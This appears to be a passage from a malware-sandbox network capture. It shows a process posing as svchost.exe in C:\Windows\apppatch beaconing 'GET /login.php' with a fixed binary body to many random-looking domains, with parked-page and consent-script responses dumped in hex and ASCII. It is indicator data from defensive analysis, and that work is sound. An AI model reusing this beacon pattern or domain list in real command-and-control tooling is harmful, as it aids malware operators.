                                                                                                                                                                                                              Data Raw: 61 38 34 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: a845<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}i
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.643431902 CEST1236INData Raw: 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f
                                                                                                                                                                                                              Data Ascii: f(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.643444061 CEST1236INData Raw: 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 76 61 72 20 65 3d 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 76 61 72 20 61 3d 22 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20
                                                                                                                                                                                                              Data Ascii: edLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.pus
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.644393921 CEST1236INData Raw: 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74 68 3b 76 61 72 20 64 3d 6c 6f 63 61 74 69 6f 6e 3b 69 66 28 64 2e 68 61 73 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d 2d 31 29 7b 77 3d 64 2e 68 61 73 68 2e 73 75 62 73 74 72
                                                                                                                                                                                                              Data Ascii: ="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.in
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.644404888 CEST1236INData Raw: 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 69 66 28 75 2e
                                                                                                                                                                                                              Data Ascii: rrentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.645529985 CEST1120INData Raw: 69 6e 67 3e 30 29 7b 61 2e 73 72 63 3d 22 2f 2f 22 2b 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 64 6e 2b 22 2f 64 65 6c 69 76 65 72 79 2f 65 6d 70 74 79 2e 68 74 6d 6c 22 7d 61 2e 6e 61 6d 65 3d 62 3b 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74
                                                                                                                                                                                                              Data Ascii: ing>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidden, please ignore");a.setAttribute("role","none");a.setAttribute("tabindex","-1");document.body.appendChild(a)}else{window.setTimeout(wi
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.645540953 CEST1236INData Raw: 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 5f 5f 63 6d 70 2e 61 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d 65 6c 73 65 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3d 3d 34 26 26 61 5b 33 5d 3d 3d 3d 66
                                                                                                                                                                                                              Data Ascii: emoveEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion:"1.0",cmpStatus:"stub",cmpDisplayStatus:"hidden
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.646646976 CEST1236INData Raw: 7d 65 6c 73 65 7b 5f 5f 67 70 70 2e 71 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d 7d 7d 7d 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 6d 73 67 68 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20
                                                                                                                                                                                                              Data Ascii: }else{__gpp.q.push([].slice.apply(a))}}}}}};window.cmp_msghandler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object"&&c!==null&&"__cmpCall" in c){var b=c.__cmpCall;windo
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.646657944 CEST1236INData Raw: 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22 6f 62 6a 65 63 74 22 26 26 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 3d 3d 3d 22 75 6e 64 65 66
                                                                                                                                                                                                              Data Ascii: window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addEventListener("message",window.cmp_msghandler,false)}};
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.646667004 CEST672INData Raw: 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 61 6c 79 71 61 7a 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74
                                                                                                                                                                                                              Data Ascii: ype="text/javascript" src="http://galyqaz.com/px.js?ch=1"></script><script type="text/javascript" src="http://galyqaz.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.647752047 CEST1236INData Raw: 72 29 7b 7d 7d 3c 2f 73 63 72 69 70 74 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 69 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 61 3d 27 32 39 35 39 31 27 20 62 3d 27 33 33 35 34 39 27 20 63 3d 27 67 61 6c 79 71 61 7a 2e 63 6f 6d 27 20 64 3d 27 65 6e
                                                                                                                                                                                                              Data Ascii: r){}}</script><meta name="tids" content="a='29591' b='33549' c='galyqaz.com' d='entity_mapped'" /><title>Galyqaz.com</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-widt


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              6192.168.2.46020944.221.84.105806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.003374100 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vocyzit.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.518697977 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:01 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58|8.46.123.33|1724431621|1724431621|0|1|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              7192.168.2.44965118.208.156.248806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.170407057 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vonypom.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.728394985 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:01 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8|8.46.123.33|1724431621|1724431621|0|1|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              8192.168.2.4496523.94.10.34806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.253634930 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lymyxid.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.793153048 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:01 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=162891e75d1d854fb9d05e52998b5935|8.46.123.33|1724431621|1724431621|0|1|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              9192.168.2.449653172.234.222.143806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.356399059 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vojyqem.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              10192.168.2.44965569.162.80.60806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.631045103 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyfyj.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.186418056 CEST924INHTTP/1.1 200 OK
                                                                                                                                                                                                              accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                              cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                              content-length: 481
                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                              date: Fri, 23 Aug 2024 16:47:02 GMT
                                                                                                                                                                                                              server: nginx
                                                                                                                                                                                                              set-cookie: sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88; path=/; domain=.lysyfyj.com; expires=Wed, 10 Sep 2092 20:01:09 GMT; max-age=2147483647; HttpOnly
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 6c 79 73 79 66 79 6a 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 79 4e 44 51 7a 4f 44 67 79 4d 69 77 69 61 57 46 30 49 6a 6f 78 4e 7a 49 30 4e 44 4d 78 4e 6a 49 79 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 6d 34 32 61 58 49 30 4e 44 46 6f 4d 48 52 68 4d 6e 59 32 59 57 63 77 59 6d 46 6d 4e 44 59 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 6a 51 30 4d 7a 45 32 4d 6a [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNDQzODgyMiwiaWF0IjoxNzI0NDMxNjIyLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydm42aXI0NDFoMHRhMnY2YWcwYmFmNDYiLCJuYmYiOjE3MjQ0MzE2MjIsInRzIjoxNzI0NDMxNjIyMTIyMjA4fQ.BHCRiez0Con86KddMGsehpcTbWt4MqaQk6ziSlKmf8I&sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88');</script></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              11192.168.2.44965691.195.240.19806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:47:01.647768021 CEST277OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: www.gahyqah.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.370780945 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              date: Fri, 23 Aug 2024 16:47:02 GMT
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
                                                                                                                                                                                                              last-modified: Fri, 23 Aug 2024 16:47:02 GMT
                                                                                                                                                                                                              x-cache-miss-from: parking-89b87dbbb-97tcb
                                                                                                                                                                                                              server: Parking/1.0
                                                                                                                                                                                                              Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 67 35 72 6c 58 73 39 52 75 52 57 34 64 67 6c 71 51 35 4c 79 64 4a 45 74 74 53 54 56 42 73 66 70 54 67 35 59 62 54 62 54 67 78 51 79 43 78 4a 61 58 2f 34 77 57 7a 74 49 41 4f 75 52 6c 32 79 56 59 68 58 30 57 47 46 31 59 61 65 77 33 55 38 35 6e 47 49 35 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 68 79 71 61 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 67 61 68 79 71 61 68 20 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com&nbsp;-&nbsp;gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From ge
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.371756077 CEST224INData Raw: 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 67 61 68 79 71 61 68 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c 6c
                                                                                                                                                                                                              Data Ascii: neral topics to more of what you would expect to find here, gahyqah.com has it all. We hope you find what you are searching for!"><link 576 rel="icon" type="image/png" href="//img.sedoparking.com/t
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.371767044 CEST1236INData Raw: 65 6d 70 6c 61 74 65 73 2f 6c 6f 67 6f 73 2f 73 65 64 6f 5f 6c 6f 67 6f 2e 70 6e 67 22 0a 2f 3e 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 37 2e 30 2e 30 20 7c 20 4d 49 54 20 4c 69 63
                                                                                                                                                                                                              Data Ascii: emplates/logos/sedo_logo.png"/><style> /*! normalize.css v7.0.0 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,footer,header
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.373781919 CEST1236INData Raw: 6d 6c 20 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 2c 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 7d 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a
                                                                                                                                                                                                              Data Ascii: ml [type=button],[type=reset],[type=submit]{-webkit-appearance:button}button::-moz576-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner{border-style:none;padding:0}button:-moz-focusr
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.373792887 CEST448INData Raw: 64 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 68 65 61 64 65 72 5f 5f 63 6f 6e 74 65 6e 74 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38
                                                                                                                                                                                                              Data Ascii: der{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buybox__content-buybox{display:inline-block;text-align:left}.container-buybox__content-heading{font-size:15px}.c
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.377532005 CEST1236INData Raw: 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a
                                                                                                                                                                                                              Data Ascii: ;text-align:center}.container-searchbox__content{display:inline-block;font-family:arial,sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.container-searchbox__input,.container-searchbox__button{border:0 none}.conta
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.377545118 CEST224INData Raw: 35 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 35 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f
                                                                                                                                                                                                              Data Ascii: 5f;font-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-message__content-interactiv
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.377552986 CEST1236INData Raw: 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 3a 30 20 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d
                                                                                                                                                                                                              Data Ascii: e{text-align:left;margin:0 15px;font-size:10px}.container-cookie-message__content-interactive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content-interactive-header{font-size:small}.containe
                                                                                                                                                                                                              Aug 23, 2024 18:47:02.379880905 CEST1236INData Raw: 78 20 32 35 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 6d 61 72 67 69 6e 3a 35 70 78 3b 74 72 61 6e 73 69 74 69 6f 6e
                                                                                                                                                                                                              Data Ascii: x 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;font-size:x-large}.btn--success:hover{background-color:#1a6b2c;border-color:#1a6b2c;c
